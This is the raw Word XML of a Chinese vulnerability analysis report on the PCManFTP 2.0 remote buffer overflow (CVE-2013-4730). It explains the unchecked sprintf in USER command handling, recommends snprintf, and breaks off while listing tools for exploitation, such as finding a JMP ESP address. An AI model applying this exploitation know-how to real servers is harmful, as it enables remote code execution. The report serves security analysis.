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C7DE6" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4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北京蓝森科技有限公司</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3226B6CC" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">PCManFTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>v2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CVE-2013-4730</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>）漏洞分析报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123F8C93" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E">
      <w:pPr>
        <w:jc w:val="center"/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02E" w14:paraId="67FD1D86" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B009C6D" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>软件名称</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>PCManFTP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="517DBDD7" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
          <w:p w14:paraId="5FE8BC71" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>软件版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>2.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E9224FF" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
          <w:p w14:paraId="47A244B2" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>漏洞模块</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>PCManFTPD2.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37323675" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
          <w:p w14:paraId="1C5FFF85" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>模块版本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2.0.0.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29DA6311" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
          <w:p w14:paraId="3A173D2C" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>编译日期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2005-01-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28928B17" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>操作系统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Windows</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> SP1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18EEBD7C" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
          <w:p w14:paraId="19E80681" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>漏洞编号</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>CVE-2013-4730</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="754E4F23" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
          <w:p w14:paraId="583EEE78" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>危害等级</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：高危</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="014F5C12" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
          <w:p w14:paraId="5C8BD649" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>漏洞类型</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：缓冲区溢出</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BA88DC0" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
          <w:p w14:paraId="0C530540" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>威胁类型</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：远程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74627D23" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="0167914B" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="7D3D9B2C" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="3F76D847" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="4D53F362" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="28ACDD68" w14:textId="6E091303" w:rsidR="0033502E" w:rsidRDefault="000608A4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分析人：</w:t>
      </w:r>
      <w:r w:rsidR="007849CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>张海龙</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB69A5A" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4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</w:t>
      </w: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-1419936660"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="1A4C31AF" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
          <w:pPr>
            <w:pStyle w:val="TOC10"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="781AC8E2" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
          <w:pPr>
            <w:pStyle w:val="TOC1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77962" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>软件简介</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc470277962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6997CCA" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="420"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc470277963" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>漏洞成因</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc470277963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955206F" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="420"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc470277964" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>利用过程</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc470277964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1CA0E01" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="420"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc470277965" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>PoC</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc470277965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F880160" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="420"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc470277966" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>结语</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc470</w:instrText>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve">277966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FA97E83" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="420"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc470277967" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>6.</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>参考资料</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc470277967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4676219" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="1D2B3253" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="1D365A71" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="4938750C" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="15EF1897" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="108F1A6C" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="5CF5523C" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="4A60C00E" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="7CB4C761" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="3E51BC77" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="60B7EE2E" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="0B394975" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="2FC3D2D0" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="067B5014" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="43BBD2ED" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="1797A8C4" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="30321270" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="0BFA251D" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="166E7585" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="269F3AB2" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="459B8E2A" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="7BA9B061" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc470277962"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="37E07240" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>PCMan's FTP Server</w:t>
      </w:r>
      <w:r>
        <w:t>是洪任谕程序员所研发的一套</w:t>
      </w:r>
      <w:r>
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器软件。该软件具有体积小、功能简单等特点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BC237" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc470277963"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞成因</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="64A67DF6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 xml:space="preserve">PCMan's FTP Server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>版本中存在缓冲区溢出漏洞。远程攻击者可借助</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>USER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>命令中的长字符串利用该漏洞执行任意代码。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>recv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>函数上下断点持续跟踪，发现服务端在接收到登录请求之后，会将受到的信息进行字符串拼接，而在字符串拼接的地方，并未进行长度控制，因此导致缓冲区溢出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>即使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">sprintf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>对于写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>的字符数是没有限制的，这就存在了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>溢出的可能性。解决这个问题，可以考虑使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> snprintf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>函数，该函数可对写入字符数做出限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623B393B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150F77BC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jc w:val="center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39154C5C" wp14:editId="011F4961">
            <wp:extent cx="5105400" cy="45624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711EF9" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E"/>
    <w:p w14:paraId="47BDE85C" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:line="18" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc470277965"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ad"/>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="43"/>
          <w:szCs w:val="43"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ad"/>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="43"/>
          <w:szCs w:val="43"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>利用过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B87EA36" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:line="18" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pP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3.1</w:t>
      </w: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准备工作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0830FCD3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1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>自动生成有序数，并能确定异常点的偏移</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>windbg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>插件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Mona2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5FF102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2)Mona2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>环境需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Python 2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DADC912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3)Windbg(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>用来定位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>JMP ESP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F078E3A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4)OllyDbg(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
